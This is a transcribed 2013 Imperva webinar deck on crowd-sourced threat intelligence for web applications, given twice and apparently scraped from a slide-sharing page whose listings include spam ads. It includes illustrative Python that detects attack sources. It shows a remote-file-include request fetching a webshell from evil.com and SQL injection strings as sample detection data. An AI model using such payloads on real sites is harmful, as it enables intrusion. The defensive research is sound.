© 2013 Imperva, Inc. All rights reserved.
Crowd Sourced Threat Intelligence
Amichai Shulman, CTO, Imperva
Confidential
May 2013
Agenda
§  Introduction to crowd sourcing and threat intelligence
§  Application layer threat intelligence
•  Research report
§  Actionable threat intelligence
•  Turning threat intelligence into community defense
§  Threat intelligence and legislation
•  Pros, Cons and State of Affairs
§  Summary & conclusions
§  Q&A
Amichai Shulman – CTO Imperva
§  Speaker at Industry Events
•  RSA, Appsec, Info Security UK, Black Hat
§  Lecturer on Information Security
•  Technion - Israel Institute of Technology
§  Former security consultant to banks & financial services firms
§  Leads the Application Defense Center (ADC)
•  Discovered over 20 commercial application vulnerabilities
§  Credited by Oracle, MS-SQL, IBM and others
Amichai Shulman is one of InfoWorld’s “Top 25 CTOs”
HII Reports
§  The Hacker Intelligence Initiative is focused on understanding how attackers are operating in practice
•  A different approach from vulnerability research
§  Data set composition
•  ~60 real world applications
•  Anonymous Proxies
§  More than 24 months of data
§  Powerful analysis system
•  Combines analytic tools with drill down capabilities
Introduction
Crowd Sourcing and Threat Information Sharing
What is Crowd Sourcing
§  “The Wisdom of Crowds: Why the Many Are Smarter Than the Few and How Collective Wisdom Shapes Business, Economies, Societies and Nations”*
Crowd Sourcing in Practice
Threat Information Sharing
§  AV vendor customers sharing suspicious files with their vendors
•  Manual process
•  If not manual, then how do you define suspicious?
§  Anti-spam vendors collecting email data from all deployments
•  Privacy?
•  Confidentiality
§  Customer groups for sharing battle stories
•  Timely?
Threat Intelligence
§  Infer NEW information regarding future attacks from looking at past attacks
§  Attacks across organizations share common characteristics
•  Sources
•  Techniques
•  Tools
•  Timelines
Application Layer Threat Intelligence
Research report
Some Observations
§  Most web attacks are part of large scale industrialized operations
•  Reuse of attack platforms
•  Reuse of techniques
•  Reuse of tools
§  Attack campaigns span meaningful time frames
More Observations
§  Izzadin Kassam attacks on US banks
•  Started with a few banks 4 months ago
•  Gradually added more targets to the list
§  #OpIsrael / #OpUSA / #OpColombia …
•  Attacks by hacktivists
•  Targeted for a specific time frame
•  Pick up many victims and target them with the SAME exact tools over the attack time frame
Methodology
§  Attack data only
•  60 applications
•  6 months of data
§  Analyze dominant attack types
•  SQL Injection
•  Remote File Include
•  Comment Spam
•  Local File Include
•  Directory Traversal
SQL Injection – Source Threat Quadrant
[Quadrant chart of attack sources. Quadrants: Multi target, persistent sources; Multi target sources; Persistent sources; Singletons]
SQL Injection – Source Threat Quadrant
[Same quadrant chart, highlighting the multi target, persistent sources]
SQL Injection – Time Perspective
[Line chart. X-axis: daily dates from 01/01/2013 to 28/02/2013. Y-axis: Targets, 0 to 18. Series: Accumulating, Current]
Comment Spam – Source Threat Quadrant
[Quadrant chart of attack sources, highlighting the multi target, persistent sources]
Remote File Include – URL Threat Quadrant
[Quadrant chart of RFI URLs, highlighting the multi target, persistent vectors]
Remote File Include - Example
§  Reconnaissance campaign based on benign URL
•  http://google.com/humans.txt
§  11 different applications targeted using the same URL
•  5144 different requests
§  Spread throughout an entire month
§  Next slide shows a network graph of attack sources to targets
•  We can learn about the relationship between attack sources
Remote File Include - Example
[Network graph of attack sources to targets]
Use of Attack Tools
[Bar chart: Percentage of Automated Attacks. X-axis attack types: RFI, LFI, SQLi, ComSpm, XSS, DT. Y-axis: 0% to 100%. Series: Total Attacks, Automated]
Actionable Threat Intelligence
Turning Threat Intelligence Into Community Defense
Actionable Intelligence Life Cycle
[Cycle diagram] Known attack patterns → Apply on traffic to identify attackers → Known attackers → Apply on traffic to identify new patterns → back to Known attack patterns
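The source threat quadrant from the SQL injection and comment spam slides, the RFI example in which one benign URL was used against 11 applications, and the life cycle above can be put together in a few dozen lines. The following is an added illustration, not Imperva's or ThreatRadar's code: the event layout, IP addresses, application names, payload strings and the thresholds of two targets and two active days are all constructed assumptions of this example.

```python
"""Toy crowd-sourced threat intelligence pipeline (added example, not Imperva code).

Two ideas from the slides are implemented on constructed WAF events:
  * the source threat quadrant: a source (or an RFI URL) is placed by how
    many distinct targets it hits and on how many distinct days it is seen;
  * the actionable intelligence life cycle: known patterns identify
    attackers, traffic from known attackers reveals new patterns, and a new
    pattern is only promoted after it is validated across several targets.
The event layout (date,source,target,type,vector) is an assumption of this
example, not a SecureSphere log format.
"""
from collections import defaultdict
from datetime import date

# Constructed sample events; every address, application name and payload
# below is invented for this example.
EVENTS = """\
2013-01-03,203.0.113.5,shop,RFI,http://google.com/humans.txt
2013-01-03,203.0.113.5,bank,RFI,http://google.com/humans.txt
2013-01-12,203.0.113.5,forum,RFI,http://google.com/humans.txt
2013-01-20,203.0.113.5,news,RFI,http://example.org/rfi-test.txt
2013-01-04,198.51.100.7,shop,SQLi,' OR 1=1--
2013-01-04,198.51.100.7,shop,SQLi,' UNION SELECT 1--
2013-02-01,198.51.100.7,shop,SQLi,' OR 1=1--
2013-01-09,192.0.2.44,forum,RFI,http://google.com/humans.txt
2013-01-09,192.0.2.44,shop,RFI,http://example.org/rfi-test.txt
2013-01-25,192.0.2.77,bank,RFI,http://example.org/rfi-test.txt
2013-01-05,192.0.2.99,bank,SQLi,' OR 1=1--
"""


def parse_events(text):
    """Parse the constructed event lines into dicts with a real date field."""
    events = []
    for line in text.strip().splitlines():
        day, src, target, kind, vector = line.split(",", 4)
        events.append({"day": date.fromisoformat(day), "src": src,
                       "target": target, "kind": kind, "vector": vector})
    return events


def quadrant(events, key="src", min_targets=2, min_days=2):
    """Place each source (key="src") or vector (key="vector") in the quadrant.

    Returns {value: label}, label being 'singleton', 'multi-target',
    'persistent' or 'multi-target persistent'. Thresholds are assumptions.
    """
    targets, days = defaultdict(set), defaultdict(set)
    for e in events:
        targets[e[key]].add(e["target"])
        days[e[key]].add(e["day"])
    labels = {}
    for k in targets:
        multi = len(targets[k]) >= min_targets
        persistent = len(days[k]) >= min_days
        if multi and persistent:
            labels[k] = "multi-target persistent"
        elif multi:
            labels[k] = "multi-target"
        elif persistent:
            labels[k] = "persistent"
        else:
            labels[k] = "singleton"
    return labels


def identify_attackers(events, known_patterns):
    """Life cycle, first half: apply known patterns to traffic -> attackers."""
    return {e["src"] for e in events if e["vector"] in known_patterns}


def discover_patterns(events, known_attackers, known_patterns, min_targets=2):
    """Life cycle, second half: traffic of known attackers -> new patterns.

    Knowledge validation: a candidate vector is promoted only when the known
    attackers used it against at least min_targets distinct applications, so
    a one-off string seen on a single site is never pushed to the community.
    """
    hit = defaultdict(set)
    for e in events:
        if e["src"] in known_attackers and e["vector"] not in known_patterns:
            hit[e["vector"]].add(e["target"])
    return {v for v, t in hit.items() if len(t) >= min_targets}


def run_cycle(events, seed_patterns, max_rounds=5):
    """Iterate patterns -> attackers -> patterns until nothing new is learned."""
    patterns, attackers = set(seed_patterns), set()
    for _ in range(max_rounds):
        attackers |= identify_attackers(events, patterns)
        new = discover_patterns(events, attackers, patterns)
        if not new:
            break
        patterns |= new
    return patterns, attackers


if __name__ == "__main__":
    evs = parse_events(EVENTS)
    for src, label in sorted(quadrant(evs).items()):
        print(f"source {src:14} {label}")
    for url, label in sorted(quadrant(evs, key="vector").items()):
        print(f"vector {url:35} {label}")
    learned, actors = run_cycle(evs, {"http://google.com/humans.txt"})
    print("patterns:", sorted(learned))
    print("attackers:", sorted(actors))
```

Seeding the cycle with only the humans.txt URL pulls in the two sources that used it, validates the second RFI URL they shared across two applications, and then catches a third source that used only that second URL; the SQL injection sources never enter because no SQLi pattern was seeded.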
Actionable Threat Intelligence
§  Multiphase
•  Distributed data collection
•  Information extraction
•  Analysis and knowledge generation
•  Knowledge validation
•  Distribution of knowledge to devices
§  Cycle must be completely automated in order to provide value in a timely manner and at scale
•  Not an information sharing hub
The Cost of Decision Making
§  Problem scale is increasing
•  Number of attacks is constantly growing
•  Number of applications per organization is growing
§  Resources are stagnant
•  No additional headcount (HC)
§  Organizations must reduce the proportion of alerts that require human decision making
§  By introducing mechanisms based on actionable intelligence, organizations increase the accuracy of detection with respect to a larger portion of the attacks
Threat Intelligence and Legislation
Pros, Cons and State of Affairs
Current Legislation
§  US Cyber Intelligence Sharing and Protection Act (CISPA)
•  Passed late April 2013
•  Sets up the LEGAL grounds for bilateral information sharing between private sector entities and government entities
•  Addresses issues of eligibility, liability and protection of shared information
Current Legislation
§  UK Cyber Security Information Sharing Partnership (CISP)
•  Launched late March 2013 (piloted through 2012)
•  Sets up procedural and technical grounds for information sharing between private sector and government
•  Comprises an operations room, reporting portal and program definitions
•  A similar program exists for cyber crime (CCRP)
Cons
§  Misuse of information by governments
•  Invade privacy in various ways
•  Otherwise would require court order
§  Information sharing platform
•  Does not provide for extraction of actionable intelligence
§  Governments usually do things the wrong way
•  E.g. the complexity of the STIX language
Pros
§  Regulate how data is being anonymized and protected
§  Encourage more organizations to take part in this effort
•  Achieve better results faster
•  Reduce overall damage to public
§  Standardize on various components
Summary & Conclusions
Summary
§  Threat intelligence has a measurable potential value for Web application attacks
§  Threat intelligence can be used to identify and detect attack sources, attack vectors and attack tools
§  Actionable threat intelligence is crucial for exploiting the potential value of threat intelligence
•  Not information sharing hubs
•  No manual processes
§  Actionable threat intelligence helps organizations reduce the cost of security decision making and enables them to handle increasing volumes of attack traffic
ThreatRadar Community Defense
§  Gathers live attack data from SecureSphere WAFs around the world
§  Distributes attack patterns and reputation data in near-real time
Community Defense – How It Works
[Diagram: User → Internet → Web Servers protected by SecureSphere, with ThreatRadar Servers in the cloud]
1. SecureSphere detects a possible RFI attack
   /vulnerable.php?C=http://evil.com/webshell.txt?
2. Sends event to ThreatRadar Cloud
3. If ThreatRadar verifies site is malicious, it will distribute new RFI pattern to community
Webinar Materials
Post-Webinar Discussions: Answers to Attendee Questions
Webinar Recording Link
Join Group: Join Imperva LinkedIn Group, Imperva Data Security Direct, for…
www.imperva.com
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 

Recently uploaded (20)

[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 

The Value of Crowd-Sourced Threat Intelligence

  • 1. © 2013 Imperva, Inc. All rights reserved. Confidential
    Crowd Sourced Threat Intelligence
    Amichai Shulman, CTO, Imperva
    May 2013
  • 2. Agenda
    §  Introduction to crowd sourcing and threat intelligence
    §  Application layer threat intelligence
      •  Research report
    §  Actionable threat intelligence
      •  Turning threat intelligence into community defense
    §  Threat intelligence and legislation
      •  Pros, Cons and Etat D’Affaire
    §  Summary & conclusions
    §  Q&A
  • 3. Amichai Shulman – CTO Imperva
    §  Speaker at Industry Events
      •  RSA, Appsec, Info Security UK, Black Hat
    §  Lecturer on Information Security
      •  Technion - Israel Institute of Technology
    §  Former security consultant to banks & financial services firms
    §  Leads the Application Defense Center (ADC)
      •  Discovered over 20 commercial application vulnerabilities
    §  Credited by Oracle, MS-SQL, IBM and others
    Amichai Shulman: one of InfoWorld’s “Top 25 CTOs”
  • 4. HII Reports
    §  The Hacker Intelligence Initiative is focused on understanding how attackers operate in practice
      •  A different approach from vulnerability research
    §  Data set composition
      •  ~60 real world applications
      •  Anonymous proxies
    §  More than 24 months of data
    §  Powerful analysis system
      •  Combines analytic tools with drill-down capabilities
  • 5. Introduction: Crowd Sourcing and Threat Information Sharing
  • 6. What is Crowd Sourcing
    §  “The Wisdom of Crowds: Why the Many Are Smarter Than the Few and How Collective Wisdom Shapes Business, Economies, Societies and Nations”*
  • 7. Crowd Sourcing in Practice
  • 8. Threat Information Sharing
    §  AV vendor customers sharing suspicious files with their vendors
      •  Manual process
      •  If not manual, then how do you define “suspicious”?
    §  Anti-spam vendors collecting email data from all deployments
      •  Privacy?
      •  Confidentiality?
    §  Customer groups for sharing battle stories
      •  Timely?
  • 9. Threat Intelligence
    §  Infer NEW information regarding future attacks by looking at past attacks
    §  Attacks across organizations share common characteristics
      •  Sources
      •  Techniques
      •  Tools
      •  Timelines
  • 10. Application Layer Threat Intelligence: Research report
  • 11. Some Observations
    §  Most web attacks are part of large-scale industrialized operations
      •  Reuse of attack platforms
      •  Reuse of techniques
      •  Reuse of tools
    §  Attack campaigns span meaningful time frames
  • 12. More Observations
    §  Izzadin Kassam attacks on US banks
      •  Started with a few banks 4 months ago
      •  Gradually added more targets to the list
    §  #OpIsrael / #OpUSA / #OpColombia …
      •  Attacks by hacktivists
      •  Targeted at a specific time frame
      •  Pick many victims and target them with the SAME exact tools over the attack time frame
  • 13. Methodology
    §  Attack data only
      •  60 applications
      •  6 months of data
    §  Analyze dominant attack types
      •  SQL Injection
      •  Remote File Include
      •  Comment Spam
      •  Local File Include
      •  Directory Traversal
  • 14. SQL Injection – Source Threat Quadrant
    [Quadrant chart of attack sources; labels: Singletons, Persistent sources, Multi target sources, Multi target persistent sources]
  • 15. SQL Injection – Source Threat Quadrant
    [Quadrant chart; label: Multi target, persistent sources]
  • 16. SQL Injection – Time Perspective
    [Chart: number of targets per day from 01/01/2013 to 28/02/2013 (y-axis 0 to 18); series: Accumulating, Current]
  • 17. Comment Spam – Source Threat Quadrant
    [Quadrant chart of attack sources; label: Multi target, persistent sources]
  • 18. Remote File Include – URL Threat Quadrant
    [Quadrant chart of attack URLs; label: Multi target, persistent vectors]
  • 19. Remote File Include – Example
    §  Reconnaissance campaign based on a benign URL
      •  http://google.com/humans.txt
    §  11 different applications targeted using the same URL
      •  5144 different requests
    §  Spread throughout an entire month
    §  Next slide shows a network graph of attack sources to targets
      •  We can learn about the relationship between attack sources
  • 20. Remote File Include – Example
    [Network graph of attack sources to targets]
  • 21. Use of Attack Tools
    [Chart: percentage of automated attacks (0% to 100%) by attack type: RFI, LFI, SQLi, ComSpm, XSS, DT, Total; series: Attacks, Automated]
  • 22. Actionable Threat Intelligence: Turning Threat Intelligence Into Community Defense
  • 23. Actionable Intelligence Life Cycle
    [Cycle diagram: Known attack patterns → Apply on traffic to identify attackers → Known attackers → Apply on traffic to identify new patterns → back to Known attack patterns]
  • 24. Actionable Threat Intelligence
    §  Multiphase
      •  Distributed data collection
      •  Information extraction
      •  Analysis and knowledge generation
      •  Knowledge validation
      •  Distribution of knowledge to devices
    §  The cycle must be completely automated in order to provide value in a timely manner and at scale
      •  Not an information sharing hub
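As an added example (not Imperva's or ThreatRadar's code), the life cycle of slide 23 and the knowledge-validation step of slide 24 written out over constructed WAF attack events, using the threat quadrant of slides 14 to 18 to decide which sources and RFI vectors are worth distributing. The addresses, application names, day numbers and the "more than one day / more than one target" thresholds are assumptions; the two remote URLs are the ones the deck shows.

```python
"""Actionable threat-intelligence cycle (slides 23-24) with the threat quadrant
of slides 14-18 as its validation step.  Added example, not Imperva's code:
events, addresses and thresholds are constructed."""
import re
from collections import defaultdict

# Constructed attack-data events: (day, source_ip, target_app, request).
# The two remote URLs are the ones the deck itself shows (slides 19 and 36).
EVENTS = [
    (1, "198.51.100.7", "app-A", "/vulnerable.php?C=http://evil.com/webshell.txt?"),
    (1, "198.51.100.7", "app-B", "/index.php?page=http://google.com/humans.txt"),
    (3, "198.51.100.7", "app-C", "/index.php?page=http://google.com/humans.txt"),
    (2, "203.0.113.9", "app-A", "/vulnerable.php?C=http://evil.com/webshell.txt?"),
    (2, "203.0.113.9", "app-D", "/view.php?f=http://google.com/humans.txt"),
    (5, "192.0.2.44", "app-B", "/x.php?inc=http://google.com/humans.txt"),
    (6, "192.0.2.44", "app-B", "/x.php?inc=http://google.com/humans.txt"),
    (4, "192.0.2.45", "app-A", "/vulnerable.php?C=http://evil.com/webshell.txt?"),
]
SEED_VECTORS = {"http://evil.com/webshell.txt"}  # knowledge already verified
REMOTE = re.compile(r"[?&]\w+=(https?://[^&\s?]+)")  # remote URL in a parameter

def remote_urls(request):
    """Remote URLs carried in query parameters, i.e. RFI include candidates."""
    return set(REMOTE.findall(request))

def quadrant(days, targets):
    """Slide 14 quadrant: persistent = active on >1 day, multi-target = >1 app."""
    multi, persistent = len(targets) > 1, len(days) > 1
    if multi and persistent:
        return "multi-target, persistent"
    return "multi-target" if multi else "persistent" if persistent else "singleton"

def profile(events, keys_of):
    """Map each key (a source or a vector) to its (active days, targets hit)."""
    prof = defaultdict(lambda: (set(), set()))
    for day, src, target, req in events:
        for key in keys_of(src, req):
            prof[key][0].add(day)
            prof[key][1].add(target)
    return prof

def identify_attackers(events, vectors):
    """Known patterns -> attackers: sources using a known vector, minus singletons."""
    hit = {src for _, src, _, req in events if remote_urls(req) & vectors}
    prof = profile(events, lambda src, req: {src} if src in hit else set())
    return {s for s, (days, targets) in prof.items()
            if quadrant(days, targets) != "singleton"}

def identify_vectors(events, attackers, vectors):
    """Known attackers -> new patterns: unknown remote URLs they use, kept only
    when aimed at more than one target (the slide 24 validation step)."""
    cand = {u for _, src, _, req in events if src in attackers
            for u in remote_urls(req) - vectors}
    prof = profile(events, lambda src, req: remote_urls(req) & cand)
    return {v for v, (days, targets) in prof.items()
            if quadrant(days, targets).startswith("multi-target")}

def run_cycle(events, seed_vectors, rounds=2):
    """Alternate the two phases of the slide 23 loop for `rounds` iterations."""
    vectors, attackers = set(seed_vectors), set()
    for _ in range(rounds):
        attackers |= identify_attackers(events, vectors)
        vectors |= identify_vectors(events, attackers, vectors)
    return attackers, vectors

if __name__ == "__main__":
    attackers, vectors = run_cycle(EVENTS, SEED_VECTORS)
    print("known attackers:", sorted(attackers))
    print("known vectors:  ", sorted(vectors))
```

The second round is where the crowd-sourcing pays off: the humans.txt vector learned from the two validated attackers in round one exposes 192.0.2.44, which never used the seed vector, while the one-off source 192.0.2.45 is never promoted.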
  • 25. The Cost of Decision Making
    §  Problem scale is increasing
      •  Number of attacks is constantly growing
      •  Number of applications per organization is growing
    §  Resources are stagnant
      •  No additional HC (headcount)
    §  Organizations must reduce the proportion of alerts that require human decision making
    §  By introducing mechanisms based on actionable intelligence, organizations increase the accuracy of detection for a larger portion of the attacks
  • 26. Threat Intelligence and Legislation: Pros, Cons and Etat D’Affaire
  • 27. Current Legislation
    §  US Cyber Intelligence Sharing and Protection Act (CISPA)
      •  Passed late April 2013
      •  Sets up the LEGAL grounds for bilateral information sharing between private sector entities and government entities
      •  Addresses issues of eligibility, liability and protection of shared information
  • 28. Current Legislation
    §  UK Cyber Security Information Sharing Partnership (CISP)
      •  Launched late March 2013 (piloted through 2012)
      •  Sets up procedural and technical grounds for information sharing between private sector and government
      •  Comprises an operations room, reporting portal and program definitions
      •  A similar program exists for cyber crime (CCRP)
  • 29. Cons
    §  Misuse of information by governments
      •  Invade privacy in various ways
      •  Otherwise would require a court order
    §  Information sharing platform
      •  Does not provide for extraction of actionable intelligence
    §  Governments usually do things the wrong way
      •  E.g. the complexity of the STIX language
  • 30. Pros
    §  Regulate how data is anonymized and protected
    §  Encourage more organizations to take part in this effort
      •  Achieve better results faster
      •  Reduce overall damage to the public
    §  Standardize on various components
  • 31. Summary & Conclusions
  • 32. Summary
    §  Threat intelligence has a measurable potential value for Web application attacks
    §  Threat intelligence can be used to identify and detect attack sources, attack vectors and attack tools
    §  Actionable threat intelligence is crucial for exploiting the potential value of threat intelligence
      •  Not information sharing hubs
      •  No manual processes
    §  Actionable threat intelligence helps organizations reduce the cost of security decision making and enables them to handle increasing volumes of attack traffic
  • 33. ThreatRadar Community Defense
  • 34. ThreatRadar Community Defense
  • 35. ThreatRadar Community Defense
    §  Gathers live attack data from SecureSphere WAFs around the world
    §  Distributes attack patterns and reputation data in near-real time
  • 36. Community Defense – How It Works
    [Diagram labels: Internet User, Web Servers, ThreatRadar Servers]
    1. SecureSphere detects a possible RFI attack, e.g. a request for /vulnerable.php?C=http://evil.com/webshell.txt?
    2. Sends the event to the ThreatRadar cloud
    3. If ThreatRadar verifies that the site is malicious, it distributes the new RFI pattern to the community
  • 37. Webinar Materials
    Join the Imperva LinkedIn Group, Imperva Data Security Direct, for…
      •  Post-Webinar Discussions
      •  Answers to Attendee Questions
      •  Webinar Recording Link
  • 38. www.imperva.com